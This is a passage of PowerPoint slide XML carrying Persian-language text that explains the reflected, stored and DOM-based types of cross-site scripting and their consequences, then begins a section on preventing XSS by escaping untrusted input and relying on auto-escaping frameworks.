                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>شامل ورودی کاربر غیرقابل اعتبار و غیرقانونی به عنوان بخشی از خروجی </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>است. یک حمله موفقیت آمیز می تواند به حمله کننده اجازه دهد </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>و </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="95000"/>
                    <a:lumOff val="5000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> دلخواهی را در مرورگر قربانی اجرا کند. به طور معمول، کاربر نیاز به ارتباط با برخی از لینک های مخرب دارد که به یک صفحه کنترل شده توسط مهاجم اشاره می کند، مانند وب سایت های آگهی مخرب، تبلیغات و یا مشابه این ها.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="95000"/>
                  <a:lumOff val="5000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ذخیره شده: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>برنامه کاربردی یا </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> ورودی کاربر تصفیه نشده را که بعدا توسط یک کاربر یا مدیر دیگر مشاهده می شود، ذخیره می کند. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ذخیره شده اغلب کاربر را با خطر بالایی از ریسک روبه رو می کند.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>DOM XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>چارچوب های جاوا اسکریپت، برنامه های تک صفحه و </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>API </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>هایی که به طور پویا شامل داده های قابل کنترل مهاجم به یک صفحه می شوند، به </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>DOM XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>آسیب پذیر هستند. در حالت ایده آل، برنامه اطلاعات قابل کنترل مهاجم را به </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>های جاوا اسکریپت نا امن ارسال نمی کند.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>حملات متداول </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> عبارتند از: سرقت نشست، گرفتن حساب، دور زدن </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>MFA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>جایگزینی یا حذف گره </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> (از قبیل پانل های ورود به سیستم تروجان)، حملات علیه مرورگر کاربر مانند دریافت نرم افزارهای مخرب، کلید ورود به سیستم و سایر حملات سمت مشتری.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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fa-IR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>منابع</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fa-IR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>خارجی</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a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نحوه پیشگیری از حمله</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>پیشگیری از</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> نیاز به جداسازی داده های غیر قابل اعتماد از محتوای مرورگر فعال دارد. این کار با انجام موارد زیر قابل دسترسی است:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>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با استفاده از چارچوب هایی که به صورت خودکار از وقوع </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> فرار می کنند به وسیله طراحی، همانند آخرین </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>Ruby on Rails، React JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>. محدودیت های حفاظت </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>هر چارچوب را بیاموزید و به طور مناسب موارد استفاده را که پوشش داده نمی شوند، مدیریت کنید.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>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فرار داده های درخواست</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>نامعتبر براساس متن در خروجی </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> (بدنه، ویژگی، جاوا اسکریپت، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>CSS، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>یا </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
